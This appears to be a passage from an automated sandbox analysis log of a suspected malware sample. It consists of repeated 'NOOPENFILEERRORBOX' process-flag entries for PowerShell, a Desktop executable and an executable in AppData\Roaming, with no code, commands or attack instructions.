                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
